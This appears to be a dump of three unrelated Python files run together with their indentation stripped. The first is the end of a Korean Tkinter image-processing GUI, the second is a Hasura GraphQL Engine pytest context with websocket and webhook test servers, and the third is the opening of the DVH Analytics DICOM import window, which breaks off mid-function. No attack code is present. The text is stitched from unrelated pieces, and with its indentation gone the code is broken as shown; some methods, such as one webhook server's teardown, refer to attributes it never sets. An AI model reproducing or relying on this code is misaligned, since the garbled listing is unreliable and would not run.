scale = askinteger('화면확대-역방향', '화면확대(역방향)할 배수-->', minvalue=2, maxvalue=32)
outW = int(inW*scale); outH = int(inH*scale);
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
outImage[int(i)][int(k)] = inImage[int(i/scale)][int(k/scale)] #{핵심}
display()
#############
def RotationImage(): #회전 {작업 중}
pass
# global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# global sx, sy, ex, ey, panYN
#
# scale = askinteger('이동', '이동 각도-->', minvalue=1, maxvalue=360)
#
# my = sx - ex;
# mx = sy - ey
#
# outW = inW;
# outH = inH;
# outImage = [];
# tmpList = []
# for i in range(outH): # 출력메모리 확보(0으로 초기화)
# tmpList = []
# for k in range(outW):
# tmpList.append(0)
# outImage.append(tmpList)
# #############################
# # 진짜 영상처리 알고리즘을 구현
# ############################
# for i in range(inH):
# for k in range(inW):
# if 0 <= i - mx < outH and 0 <= k - my < outW:
# outImage[i - mx][k - my] = inImage[i][k] #{작업 중}
#
# display()
# ######################
# # 화면 이동 알고리즘
# def panImage():
# global panYN
# panYN = True
#
# def mouseClick(event): # 동일 영상 알고리즘
# global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# global sx, sy, ex, ey, panYN
# if not panYN:
# return
# sx = event.x;
# sy = event.y;
#
# def mouseDrop(event): # 동일 영상 알고리즘
# global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# global sx, sy, ex, ey, panYN
# if not panYN:
# return
# ex = event.x;
# ey = event.y;
# my = sx - ex;
# mx = sy - ey
#
# # 중요! 출력메모리의 크기를 결정
# outW = inW;
# outH = inH;
# outImage = [];
# tmpList = []
# for i in range(outH): # 출력메모리 확보(0으로 초기화)
# tmpList = []
# for k in range(outW):
# tmpList.append(0)
# outImage.append(tmpList)
# #############################
# # 진짜 영상처리 알고리즘을 구현
# ############################
# for i in range(inH):
# for k in range(inW):
# if 0 <= i - mx < outH and 0 <= k - my < outW:
# outImage[i - mx][k - my] = inImage[i][k] # Q)?
# panYN = False
# display()
################
def SyntheticImage():
pass
##
def saveFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
pass
def exitFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
pass
## 전역 변수부
window, canvas, paper, filename = [None] * 4
inImage, outImage = [], []; inW, inH, outW, outH = [0] * 4
panYN = False; sx, sy, ex, ey = [0] * 4
# ###
# Cf. <변수 정의>
# Window : 화면에 윈도창 출력
# Canvas : 출력 화면의 모양 나타내기
# Paper : 사진 이미지
# Filename : 불러올 이미지 파일
# inImage, inW, inH : (영상 처리 전)원시 영상에서 불러온 이미지, 그 폭, 그 높이
# outImage, outW, outH : (영상 처리 후)목적 영상으로 출력할 이미지, 그 폭, 그 높이
# panYN : 마우스 이동 변수
# sx, sy, ex, ey : 시작점x, 시작점y, 끝점x, 끝점y
# ##
## 메인 코드부
window = Tk(); window.geometry('400x400');
window.title('영상 처리&데이터 분석 Ver 0.3')
window.bind("<Button-1>", mouseClick)
window.bind("<ButtonRelease-1>", mouseDrop)
mainMenu = Menu(window);window.config(menu=mainMenu)
fileMenu = Menu(mainMenu);mainMenu.add_cascade(label='파일', menu=fileMenu)
fileMenu.add_command(label='열기', command=openFile)
fileMenu.add_command(label='저장', command=saveFile)
fileMenu.add_separator()
fileMenu.add_command(label='종료', command=exitFile)
pixelMenu = Menu(mainMenu);mainMenu.add_cascade(label='화소점처리', menu=pixelMenu)
pixelMenu.add_command(label='동일영상', command=equal)
pixelMenu.add_command(label='밝게하기', command=lambda: addImage(1)) #덧셈
pixelMenu.add_command(label='어둡게하기', command=lambda: addImage(2)) #뺄셈
pixelMenu.add_command(label='밝게하기(뚜렷하게)', command=lambda: addImage(3)) #곱셈
pixelMenu.add_command(label='어둡게하기(희미하게)', command=lambda: addImage(4)) #나눗셈
#{작업 하기}
pixelMenu.add_command(label='AND연산', command=lambda: addImage(5))
pixelMenu.add_command(label="OR연산", command=lambda: addImage(6))
pixelMenu.add_command(label='XOR연산', command=lambda: addImage(7))
pixelMenu.add_command(label='반전', command=lambda: addImage(8))
pixelMenu.add_command(label='감마', command=lambda: addImage(9))
pixelMenu.add_command(label='파라볼라(Cap)', command=lambda: addImage(10))
pixelMenu.add_command(label='파라볼라(Cup)', command=lambda: addImage(11))
pixelMenu.add_command(label='이진화', command=lambda: addImage(12))
pixelMenu.add_command(label='범위강조', command=lambda: addImage(13))
##
geoMenu = Menu(mainMenu);mainMenu.add_cascade(label='기하학 처리', menu=geoMenu)
geoMenu.add_command(label='상하반전', command=upDown)
geoMenu.add_command(label='좌우반전', command=LRReversalImage)
geoMenu.add_command(label='화면이동', command=panImage)
geoMenu.add_command(label='화면축소', command=zoomOut)
geoMenu.add_command(label='화면확대-전방향', command=zoomInForW)
geoMenu.add_command(label='화면확대-역방향(이웃 화소 보간법)', command=zoomInBackW)
##{작업 하기}
geoMenu.add_command(label='회전', command=RotationImage)#{작업 중}
geoMenu.add_command(label='영상 합성', command=SyntheticImage)
##
analyseMenu = Menu(mainMenu);
analyzeMenu = Menu(mainMenu);mainMenu.add_cascade(label='데이터분석', menu=analyzeMenu)
analyzeMenu.add_command(label='평균값', command=lambda: analyzeData(1))
analyzeMenu.add_command(label='입출력 시 최대값, 최소값', command=lambda: analyzeData(2))
#더 작업하기
window.mainloop()
|
context.py | #!/usr/bin/env python3
from http import HTTPStatus
from socketserver import ThreadingMixIn
from urllib.parse import urlparse
from ruamel.yaml.comments import CommentedMap as OrderedDict # to avoid '!!omap' in yaml
import threading
import http.server
import json
import queue
import socket
import subprocess
import time
import string
import random
import os
import re
import ruamel.yaml as yaml
import requests
import websocket
from sqlalchemy import create_engine
from sqlalchemy.schema import MetaData
import graphql_server
import graphql
# pytest has removed the global pytest.config
# As a solution to this we are going to store it in PyTestConf.config
class PytestConf():
pass
class HGECtxError(Exception):
pass
class GQLWsClient():
def __init__(self, hge_ctx, endpoint):
self.hge_ctx = hge_ctx
self.ws_queue = queue.Queue(maxsize=-1)
self.ws_url = urlparse(hge_ctx.hge_url)._replace(scheme='ws',
path=endpoint)
self.create_conn()
def create_conn(self):
self.ws_queue.queue.clear()
self.ws_id_query_queues = dict()
self.ws_active_query_ids = set()
self.connected_event = threading.Event()
self.init_done = False
self.is_closing = False
self.remote_closed = False
self._ws = websocket.WebSocketApp(self.ws_url.geturl(),
on_open=self._on_open, on_message=self._on_message, on_close=self._on_close)
self.wst = threading.Thread(target=self._ws.run_forever)
self.wst.daemon = True
self.wst.start()
def recreate_conn(self):
self.teardown()
self.create_conn()
def wait_for_connection(self, timeout=10):
assert not self.is_closing
assert self.connected_event.wait(timeout=timeout)
def get_ws_event(self, timeout):
return self.ws_queue.get(timeout=timeout)
def has_ws_query_events(self, query_id):
return not self.ws_id_query_queues[query_id].empty()
def get_ws_query_event(self, query_id, timeout):
return self.ws_id_query_queues[query_id].get(timeout=timeout)
def send(self, frame):
self.wait_for_connection()
if frame.get('type') == 'stop':
self.ws_active_query_ids.discard( frame.get('id') )
elif frame.get('type') == 'start' and 'id' in frame:
self.ws_id_query_queues[frame['id']] = queue.Queue(maxsize=-1)
self._ws.send(json.dumps(frame))
def init_as_admin(self):
headers={}
if self.hge_ctx.hge_key:
headers = {'x-hasura-admin-secret': self.hge_ctx.hge_key}
self.init(headers)
def init(self, headers={}):
payload = {'type': 'connection_init', 'payload': {}}
if headers and len(headers) > 0:
payload['payload']['headers'] = headers
self.send(payload)
ev = self.get_ws_event(3)
assert ev['type'] == 'connection_ack', ev
self.init_done = True
def stop(self, query_id):
data = {'id': query_id, 'type': 'stop'}
self.send(data)
self.ws_active_query_ids.discard(query_id)
def gen_id(self, size=6, chars=string.ascii_letters + string.digits):
new_id = ''.join(random.choice(chars) for _ in range(size))
if new_id in self.ws_active_query_ids:
return self.gen_id(size, chars)
return new_id
def send_query(self, query, query_id=None, headers={}, timeout=60):
graphql.parse(query['query'])
if headers and len(headers) > 0:
#Do init If headers are provided
self.init(headers)
elif not self.init_done:
self.init()
if query_id == None:
query_id = self.gen_id()
frame = {
'id': query_id,
'type': 'start',
'payload': query,
}
self.ws_active_query_ids.add(query_id)
self.send(frame)
while True:
yield self.get_ws_query_event(query_id, timeout)
def _on_open(self):
if not self.is_closing:
self.connected_event.set()
def _on_message(self, message):
# NOTE: make sure we preserve key ordering so we can test the ordering
# properties in the graphql spec properly
json_msg = json.loads(message, object_pairs_hook=OrderedDict)
if 'id' in json_msg:
query_id = json_msg['id']
if json_msg.get('type') == 'stop':
#Remove from active queries list
self.ws_active_query_ids.discard( query_id )
if not query_id in self.ws_id_query_queues:
self.ws_id_query_queues[json_msg['id']] = queue.Queue(maxsize=-1)
#Put event in the correponding query_queue
self.ws_id_query_queues[query_id].put(json_msg)
elif json_msg['type'] != 'ka':
#Put event in the main queue
self.ws_queue.put(json_msg)
def _on_close(self):
self.remote_closed = True
self.init_done = False
def teardown(self):
self.is_closing = True
if not self.remote_closed:
self._ws.close()
self.wst.join()
class ActionsWebhookHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(HTTPStatus.OK)
self.end_headers()
def do_POST(self):
content_len = self.headers.get('Content-Length')
req_body = self.rfile.read(int(content_len)).decode("utf-8")
self.req_json = json.loads(req_body)
req_headers = self.headers
req_path = self.path
self.log_message(json.dumps(self.req_json))
if req_path == "/create-user":
resp, status = self.create_user()
self._send_response(status, resp)
elif req_path == "/create-users":
resp, status = self.create_users()
self._send_response(status, resp)
elif req_path == "/invalid-response":
self._send_response(HTTPStatus.OK, "some-string")
elif req_path == "/mirror-action":
resp, status = self.mirror_action()
self._send_response(status, resp)
else:
self.send_response(HTTPStatus.NO_CONTENT)
self.end_headers()
def create_user(self):
email_address = self.req_json['input']['email']
name = self.req_json['input']['name']
if not self.check_email(email_address):
response = {
'message': 'Given email address is not valid',
'code': 'invalid-email'
}
return response, HTTPStatus.BAD_REQUEST
gql_query = '''
mutation ($email: String! $name: String!) {
insert_user_one(object: {email: $email, name: $name}){
id
}
}
'''
query = {
'query': gql_query,
'variables': {
'email': email_address,
'name': name
}
}
code, resp = self.execute_query(query)
if code != 200 or 'data' not in resp:
response = {
'message': 'GraphQL query execution failed',
'code': 'unexpected'
}
return response, HTTPStatus.BAD_REQUEST
response = resp['data']['insert_user_one']
return response, HTTPStatus.OK
def create_users(self):
inputs = self.req_json['input']['users']
for input in inputs:
email_address = input['email']
if not self.check_email(email_address):
response = {
'message': 'Email address is not valid: ' + email_address,
'code': 'invalid-email'
}
return response, HTTPStatus.BAD_REQUEST
gql_query = '''
mutation ($insert_inputs: [user_insert_input!]!){
insert_user(objects: $insert_inputs){
returning{
id
}
}
}
'''
query = {
'query': gql_query,
'variables': {
'insert_inputs': inputs
}
}
code, resp = self.execute_query(query)
if code != 200 or 'data' not in resp:
response = {
'message': 'GraphQL query execution failed',
'code': 'unexpected'
}
return response, HTTPStatus.BAD_REQUEST
response = resp['data']['insert_user']['returning']
return response, HTTPStatus.OK
def mirror_action(self):
response = self.req_json['input']['arg']
return response, HTTPStatus.OK
def check_email(self, email):
regex = '^\w+([\.-]?\w+)*@\w+([\.-]?\w+)*(\.\w{2,3})+$'
return re.search(regex,email)
def execute_query(self, query):
headers = {}
admin_secret = self.hge_ctx.hge_key
if admin_secret is not None:
headers['X-Hasura-Admin-Secret'] = admin_secret
code, resp, _ = self.hge_ctx.anyq('/v1/graphql', query, headers)
self.log_message(json.dumps(resp))
return code, resp
def _send_response(self, status, body):
self.send_response(status)
self.send_header('Content-Type', 'application/json')
self.send_header('Set-Cookie', 'abcd')
self.end_headers()
self.wfile.write(json.dumps(body).encode("utf-8"))
class ActionsWebhookServer(http.server.HTTPServer):
def __init__(self, hge_ctx, server_address):
handler = ActionsWebhookHandler
handler.hge_ctx = hge_ctx
super().__init__(server_address, handler)
def server_bind(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
class EvtsWebhookHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(HTTPStatus.OK)
self.end_headers()
def do_POST(self):
content_len = self.headers.get('Content-Length')
req_body = self.rfile.read(int(content_len)).decode("utf-8")
req_json = json.loads(req_body)
req_headers = self.headers
req_path = self.path
self.log_message(json.dumps(req_json))
if req_path == "/fail":
self.send_response(HTTPStatus.INTERNAL_SERVER_ERROR)
self.end_headers()
self.server.error_queue.put({"path": req_path,
"body": req_json,
"headers": req_headers})
elif req_path == "/timeout_short":
time.sleep(5)
self.send_response(HTTPStatus.NO_CONTENT)
self.end_headers()
self.server.error_queue.put({"path": req_path,
"body": req_json,
"headers": req_headers})
elif req_path == "/timeout_long":
time.sleep(5)
self.send_response(HTTPStatus.NO_CONTENT)
self.end_headers()
self.server.resp_queue.put({"path": req_path,
"body": req_json,
"headers": req_headers})
else:
self.send_response(HTTPStatus.NO_CONTENT)
self.end_headers()
self.server.resp_queue.put({"path": req_path,
"body": req_json,
"headers": req_headers})
# A very slightly more sane/performant http server.
# See: https://stackoverflow.com/a/14089457/176841
#
# TODO use this elsewhere, or better yet: use e.g. bottle + waitress
class ThreadedHTTPServer(ThreadingMixIn, http.server.HTTPServer):
"""Handle requests in a separate thread."""
class EvtsWebhookServer(ThreadedHTTPServer):
def __init__(self, server_address):
self.resp_queue = queue.Queue(maxsize=1)
self.error_queue = queue.Queue()
super().__init__(server_address, EvtsWebhookHandler)
def server_bind(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
def get_event(self, timeout):
return self.resp_queue.get(timeout=timeout)
def get_error_queue_size(self):
sz = 0
while not self.error_queue.empty():
self.error_queue.get()
sz = sz + 1
return sz
def teardown(self):
self.evt_trggr_httpd.shutdown()
self.evt_trggr_httpd.server_close()
graphql_server.stop_server(self.graphql_server)
self.gql_srvr_thread.join()
self.evt_trggr_web_server.join()
class HGECtxGQLServer:
def __init__(self, hge_urls):
# start the graphql server
self.graphql_server = graphql_server.create_server('127.0.0.1', 5000)
self.hge_urls = graphql_server.set_hge_urls(hge_urls)
self.gql_srvr_thread = threading.Thread(target=self.graphql_server.serve_forever)
self.gql_srvr_thread.start()
def teardown(self):
graphql_server.stop_server(self.graphql_server)
self.gql_srvr_thread.join()
class HGECtx:
def __init__(self, hge_url, pg_url, config):
self.http = requests.Session()
self. hge_key = config.getoption('--hge-key')
self.hge_url = hge_url
self.pg_url = pg_url
self.hge_webhook = config.getoption('--hge-webhook')
hge_jwt_key_file = config.getoption('--hge-jwt-key-file')
if hge_jwt_key_file is None:
self.hge_jwt_key = None
else:
with open(hge_jwt_key_file) as f:
self.hge_jwt_key = f.read()
self.hge_jwt_conf = config.getoption('--hge-jwt-conf')
self.webhook_insecure = config.getoption('--test-webhook-insecure')
self.metadata_disabled = config.getoption('--test-metadata-disabled')
self.may_skip_test_teardown = False
self.engine = create_engine(self.pg_url)
self.meta = MetaData()
self.ws_read_cookie = config.getoption('--test-ws-init-cookie')
self.hge_scale_url = config.getoption('--test-hge-scale-url')
self.avoid_err_msg_checks = config.getoption('--avoid-error-message-checks')
self.ws_client = GQLWsClient(self, '/v1/graphql')
# HGE version
result = subprocess.run(['../../scripts/get-version.sh'], shell=False, stdout=subprocess.PIPE, check=True)
env_version = os.getenv('VERSION')
self.version = env_version if env_version else result.stdout.decode('utf-8').strip()
if not self.metadata_disabled and not config.getoption('--skip-schema-setup'):
try:
st_code, resp = self.v1q_f('queries/clear_db.yaml')
except requests.exceptions.RequestException as e:
self.teardown()
raise HGECtxError(repr(e))
assert st_code == 200, resp
# Postgres version
pg_version_text = self.sql('show server_version_num').fetchone()['server_version_num']
self.pg_version = int(pg_version_text)
def reflect_tables(self):
self.meta.reflect(bind=self.engine)
def anyq(self, u, q, h):
resp = self.http.post(
self.hge_url + u,
json=q,
headers=h
)
# NOTE: make sure we preserve key ordering so we can test the ordering
# properties in the graphql spec properly
# Returning response headers to get the request id from response
return resp.status_code, resp.json(object_pairs_hook=OrderedDict), resp.headers
def sql(self, q):
conn = self.engine.connect()
res = conn.execute(q)
conn.close()
return res
def v1q(self, q, headers = {}):
h = headers.copy()
if self.hge_key is not None:
h['X-Hasura-Admin-Secret'] = self.hge_key
resp = self.http.post(
self.hge_url + "/v1/query",
json=q,
headers=h
)
# NOTE: make sure we preserve key ordering so we can test the ordering
# properties in the graphql spec properly
return resp.status_code, resp.json(object_pairs_hook=OrderedDict)
def v1q_f(self, fn):
with open(fn) as f:
# NOTE: preserve ordering with ruamel
yml = yaml.YAML()
return self.v1q(yml.load(f))
def teardown(self):
self.http.close()
self.engine.dispose()
|
import_dicom.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# models.import_dicom.py
"""
Classes for the DICOM import GUI and threading
"""
# Copyright (c) 2016-2019 Dan Cutright
# This file is part of DVH Analytics, released under a BSD license.
# See the file LICENSE included with this distribution, also
# available at https://github.com/cutright/DVH-Analytics
import wx
import wx.adv
from wx.lib.agw.customtreectrl import (
CustomTreeCtrl,
TR_AUTO_CHECK_CHILD,
TR_AUTO_CHECK_PARENT,
TR_DEFAULT_STYLE,
)
from datetime import date as datetime_obj, datetime
from dateutil.parser import parse as parse_date
from os import listdir, remove
from os.path import isdir, join
from pubsub import pub
from multiprocessing import Pool
from threading import Thread
from queue import Queue
from functools import partial
from dvha.db import update as db_update
from dvha.db.sql_connector import DVH_SQL, write_test as sql_write_test
from dvha.models.dicom_tree_builder import (
DicomTreeBuilder,
PreImportFileSetParserWorker,
)
from dvha.db.dicom_parser import DICOM_Parser, PreImportData
from dvha.dialogs.main import DatePicker
from dvha.dialogs.roi_map import (
AddPhysician,
AddPhysicianROI,
DelPhysicianROI,
AssignVariation,
DelVariation,
AddROIType,
RoiManager,
ChangePlanROIName,
)
from dvha.models.data_table import DataTable
from dvha.models.roi_map import RemapROIFrame
from dvha.paths import ICONS, TEMP_DIR
from dvha.tools.dicom_dose_sum import DoseGrid
from dvha.tools.errors import ErrorDialog, push_to_log
from dvha.tools.roi_name_manager import clean_name
from dvha.tools.utilities import (
datetime_to_date_string,
get_elapsed_time,
move_files_to_new_path,
rank_ptvs_by_D95,
set_msw_background_color,
is_windows,
get_tree_ctrl_image,
remove_empty_sub_folders,
get_window_size,
set_frame_icon,
PopupMenu,
MessageDialog,
get_new_uids_by_directory,
edit_study_uid,
)
from dvha.tools.threading_progress import ProgressFrame
class ImportDicomFrame(wx.Frame):
"""
Class used to generate the DICOM import GUI
"""
def __init__(self, roi_map, options, inbox=None, auto_parse=False):
"""
:param roi_map: roi_map object
:type roi_map: DatabaseROIs
:param options: user options object
:type options: Options
:param inbox: set the inbox, defaults to value in options if None
"""
wx.Frame.__init__(self, None, title="Import DICOM")
set_frame_icon(self)
set_msw_background_color(
self
) # If windows, change the background color
self.options = options
self.auto_parse = auto_parse
self.inbox = inbox
with DVH_SQL() as cnx:
cnx.initialize_database()
self.SetSize(get_window_size(0.804, 0.762))
self.parsed_dicom_data = {}
self.selected_uid = None
self.roi_map = roi_map
self.selected_roi = None
self.start_path = self.options.INBOX_DIR
self.checkbox = {}
keys = [
"birth_date",
"sim_study_date",
"physician",
"tx_site",
"rx_dose",
]
for key in keys:
self.checkbox["%s_1" % key] = wx.CheckBox(
self, wx.ID_ANY, "Apply to all studies"
)
self.checkbox["%s_2" % key] = wx.CheckBox(
self, wx.ID_ANY, "Only if missing"
)
self.global_plan_over_rides = {
key: {"value": None, "only_if_missing": False} for key in keys
}
self.text_ctrl_directory = wx.TextCtrl(
self, wx.ID_ANY, "", style=wx.TE_READONLY
)
with DVH_SQL() as cnx:
tx_sites = cnx.get_unique_values("Plans", "tx_site")
self.input = {
"mrn": wx.TextCtrl(self, wx.ID_ANY, ""),
"study_instance_uid": wx.TextCtrl(self, wx.ID_ANY, ""),
"birth_date": wx.TextCtrl(
self, wx.ID_ANY, "", style=wx.TE_READONLY
),
"sim_study_date": wx.TextCtrl(
self, wx.ID_ANY, "", style=wx.TE_READONLY
),
"physician": wx.ComboBox(
self,
wx.ID_ANY,
choices=self.roi_map.get_physicians(),
style=wx.CB_DROPDOWN | wx.CB_READONLY,
),
"tx_site": wx.ComboBox(
self, wx.ID_ANY, choices=tx_sites, style=wx.CB_DROPDOWN
),
"rx_dose": wx.TextCtrl(self, wx.ID_ANY, ""),
}
# 'fx_grp': wx.ComboBox(self, wx.ID_ANY, choices=['1'], style=wx.CB_DROPDOWN | wx.CB_READONLY)}
self.input["physician"].SetValue("")
self.input["tx_site"].SetValue("")
# self.input['fx_grp'].SetValue('1')
self.button_edit_sim_study_date = wx.Button(self, wx.ID_ANY, "Edit")
self.button_edit_birth_date = wx.Button(self, wx.ID_ANY, "Edit")
self.button_apply_plan_data = wx.Button(self, wx.ID_ANY, "Apply")
self.button_delete_study = wx.Button(
self, wx.ID_ANY, "Delete Study in Database with this UID"
)
self.button_delete_study.Disable()
self.button_add_physician = wx.Button(self, wx.ID_ANY, "Add")
self.button_browse = wx.Button(self, wx.ID_ANY, u"Browse…")
self.checkbox_subfolders = wx.CheckBox(
self, wx.ID_ANY, "Search within sub-folders"
)
self.checkbox_keep_in_inbox = wx.CheckBox(
self, wx.ID_ANY, "Leave files in inbox"
)
self.checkbox_copy_misc_files = wx.CheckBox(
self, wx.ID_ANY, "Copy images/misc DICOM"
)
self.panel_study_tree = wx.Panel(
self, wx.ID_ANY, style=wx.BORDER_SUNKEN
)
self.button_import = wx.Button(self, wx.ID_ANY, "Import")
self.button_cancel = wx.Button(self, wx.ID_CANCEL, "Cancel")
self.button_save_roi_map = wx.Button(self, wx.ID_ANY, "Save ROI Map")
self.button_preprocess = wx.Button(
self, wx.ID_ANY, "Pre-Process DICOM"
)
self.panel_roi_tree = wx.Panel(self, wx.ID_ANY, style=wx.BORDER_SUNKEN)
self.input_roi = {
"physician": wx.ComboBox(
self,
wx.ID_ANY,
choices=[],
style=wx.CB_DROPDOWN | wx.CB_READONLY,
),
"type": wx.ComboBox(
self,
wx.ID_ANY,
choices=self.options.ROI_TYPES,
style=wx.CB_DROPDOWN,
),
}
self.input_roi["type"].SetValue("")
self.button_roi_manager = wx.Button(self, wx.ID_ANY, "ROI Manager")
self.button_save_roi_type_in_map = wx.Button(
self, wx.ID_ANY, "Store in ROI Map"
)
self.enable_inputs(False)
self.disable_roi_inputs()
styles = TR_AUTO_CHECK_CHILD | TR_AUTO_CHECK_PARENT | TR_DEFAULT_STYLE
self.tree_ctrl_import = CustomTreeCtrl(
self.panel_study_tree, wx.ID_ANY, agwStyle=styles
)
self.tree_ctrl_import.SetBackgroundColour(wx.WHITE)
self.tree_ctrl_roi = CustomTreeCtrl(
self.panel_roi_tree, wx.ID_ANY, agwStyle=TR_DEFAULT_STYLE
)
self.tree_ctrl_roi.SetBackgroundColour(wx.WHITE)
self.tree_ctrl_roi_root = self.tree_ctrl_roi.AddRoot(
"RT Structures (right-click an ROI to edit)", ct_type=0
)
self.checkbox_include_uncategorized = wx.CheckBox(
self, wx.ID_ANY, "Import uncategorized ROIs"
)
self.checkbox_auto_sum_dose = wx.CheckBox(
self, wx.ID_ANY, "Sum all dose grids in a study"
)
self.allow_input_roi_apply = False
self.__do_bind()
self.__set_properties()
self.__do_layout()
self.__do_subscribe()
self.is_all_data_parsed = False
self.dicom_importer = None
self.incomplete_studies = []
self.PreprocessDicom = None
self.run()
def __do_subscribe(self):
"""After DICOM directory is scanned and sorted, parse_dicom_data will be called"""
pub.subscribe(self.parse_dicom_data, "parse_dicom_data")
pub.subscribe(
self.set_pre_import_parsed_dicom_data,
"set_pre_import_parsed_dicom_data",
)
pub.subscribe(self.pre_import_complete, "pre_import_complete")
pub.subscribe(self.pre_import_canceled, "pre_import_canceled")
pub.subscribe(self.build_dicom_file_tree, "build_dicom_file_tree")
def __do_bind(self):
self.Bind(wx.EVT_BUTTON, self.on_browse, id=self.button_browse.GetId())
self.Bind(
wx.EVT_TREE_SEL_CHANGED,
self.on_file_tree_select,
id=self.tree_ctrl_import.GetId(),
)
self.Bind(
wx.EVT_TREE_SEL_CHANGED,
self.on_roi_tree_select,
id=self.tree_ctrl_roi.GetId(),
)
self.Bind(
wx.EVT_TREE_ITEM_RIGHT_CLICK,
self.on_roi_tree_right_click,
id=self.tree_ctrl_roi.GetId(),
)
for input_obj in self.input.values():
self.Bind(wx.EVT_TEXT, self.on_text_change, id=input_obj.GetId())
self.Bind(
wx.EVT_BUTTON,
self.on_delete_study,
id=self.button_delete_study.GetId(),
)
self.Bind(
wx.EVT_COMBOBOX,
self.on_text_change,
id=self.input["physician"].GetId(),
)
self.Bind(
wx.EVT_COMBOBOX,
self.on_text_change,
id=self.input["tx_site"].GetId(),
)
self.Bind(
wx.EVT_BUTTON,
self.on_apply_plan,
id=self.button_apply_plan_data.GetId(),
)
self.Bind(
wx.EVT_COMBOBOX,
self.on_apply_roi,
id=self.input_roi["type"].GetId(),
)
self.Bind(
wx.EVT_COMBOBOX,
self.on_apply_roi,
id=self.input_roi["physician"].GetId(),
)
for key in [
"birth_date",
"sim_study_date",
"physician",
"tx_site",
"rx_dose",
]:
self.Bind(
wx.EVT_CHECKBOX,
self.on_check_apply_all,
id=self.checkbox["%s_1" % key].GetId(),
)
self.Bind(
wx.EVT_CHECKBOX,
self.on_check_apply_all,
id=self.checkbox["%s_2" % key].GetId(),
)
self.Bind(
wx.EVT_BUTTON,
self.on_edit_birth_date,
id=self.button_edit_birth_date.GetId(),
)
self.Bind(
wx.EVT_BUTTON,
self.on_edit_sim_study_date,
id=self.button_edit_sim_study_date.GetId(),
)
self.Bind(
wx.EVT_BUTTON,
self.on_add_physician,
id=self.button_add_physician.GetId(),
)
self.Bind(wx.EVT_BUTTON, self.on_import, id=self.button_import.GetId())
self.Bind(wx.EVT_BUTTON, self.on_cancel, id=self.button_cancel.GetId())
self.Bind(
wx.EVT_BUTTON,
self.on_save_roi_map,
id=self.button_save_roi_map.GetId(),
)
self.Bind(
wx.EVT_BUTTON,
self.on_preprocess,
id=self.button_preprocess.GetId(),
)
self.Bind(
wx.EVT_BUTTON,
self.on_roi_manager,
id=self.button_roi_manager.GetId(),
)
self.Bind(
wx.EVT_COMBOBOX,
self.on_physician_roi_change,
id=self.input_roi["physician"].GetId(),
)
self.Bind(wx.EVT_CLOSE, self.on_cancel)
self.Bind(
wx.EVT_BUTTON,
self.on_save_roi_type_in_map,
id=self.button_save_roi_type_in_map.GetId(),
)
def __set_properties(self):
self.checkbox_subfolders.SetFont(
wx.Font(
11,
wx.FONTFAMILY_DEFAULT,
wx.FONTSTYLE_NORMAL,
wx.FONTWEIGHT_NORMAL,
0,
"",
)
)
value = (
self.options.SEARCH_SUBFOLDERS
if hasattr(self.options, "SEARCH_SUBFOLDERS")
else 1
)
self.checkbox_subfolders.SetValue(value)
self.checkbox_keep_in_inbox.SetFont(
wx.Font(
11,
wx.FONTFAMILY_DEFAULT,
wx.FONTSTYLE_NORMAL,
wx.FONTWEIGHT_NORMAL,
0,
"",
)
)
self.checkbox_keep_in_inbox.SetToolTip(
"Successfully imported DICOM files will either be copied or moved into "
"your Imported Directory. Check this box to copy. Uncheck this box to "
"remove these files from the inbox."
)
value = (
self.options.KEEP_IN_INBOX
if hasattr(self.options, "KEEP_IN_INBOX")
else 0
)
self.checkbox_keep_in_inbox.SetValue(value)
self.checkbox_copy_misc_files.SetFont(
wx.Font(
11,
wx.FONTFAMILY_DEFAULT,
wx.FONTSTYLE_NORMAL,
wx.FONTWEIGHT_NORMAL,
0,
"",
)
)
self.checkbox_copy_misc_files.SetToolTip(
"Uncheck to only copy DICOM-RT Dose, Structure and Plan files to DVH imported directory."
)
value = (
self.options.COPY_MISC_FILES
if hasattr(self.options, "COPY_MISC_FILES")
else 0
)
self.checkbox_copy_misc_files.SetValue(value)
self.checkbox_include_uncategorized.SetFont(
wx.Font(
11,
wx.FONTFAMILY_DEFAULT,
wx.FONTSTYLE_NORMAL,
wx.FONTWEIGHT_NORMAL,
0,
"",
)
)
self.checkbox_auto_sum_dose.SetFont(
wx.Font(
11,
wx.FONTFAMILY_DEFAULT,
wx.FONTSTYLE_NORMAL,
wx.FONTWEIGHT_NORMAL,
0,
"",
)
)
value = (
self.options.IMPORT_UNCATEGORIZED
if hasattr(self.options, "IMPORT_UNCATEGORIZED")
else 0
)
self.checkbox_include_uncategorized.SetValue(value)
value = (
self.options.AUTO_SUM_DOSE
if hasattr(self.options, "AUTO_SUM_DOSE")
else 1
)
self.checkbox_auto_sum_dose.SetValue(value)
self.checkbox_auto_sum_dose.SetToolTip(
"If multiple dose grids are found for one patient, dose grids will be "
"summed and composite DVHs will be stored. "
"This is typically recommended."
)
for checkbox in self.checkbox.values():
checkbox.SetFont(
wx.Font(
11,
wx.FONTFAMILY_DEFAULT,
wx.FONTSTYLE_NORMAL,
wx.FONTWEIGHT_NORMAL,
0,
"",
)
)
self.image_list = wx.ImageList(16, 16)
self.tree_ctrl_images = {
"yes": self.image_list.Add(get_tree_ctrl_image(ICONS["ok-green"])),
"no": self.image_list.Add(get_tree_ctrl_image(ICONS["ko-red"])),
}
self.tree_ctrl_roi.AssignImageList(self.image_list)
self.button_cancel.SetToolTip(
"Cancel and do not save ROI Map changes since last save."
)
self.button_import.SetToolTip(
"Save ROI Map changes and import checked studies."
)
self.button_save_roi_map.SetToolTip("Save ROI Map changes.")
def __do_layout(self):
labels = {
"mrn": "MRN:",
"study_instance_uid": "Study Instance UID:",
"birth_date": "Birthdate:",
"sim_study_date": "Sim Study Date:",
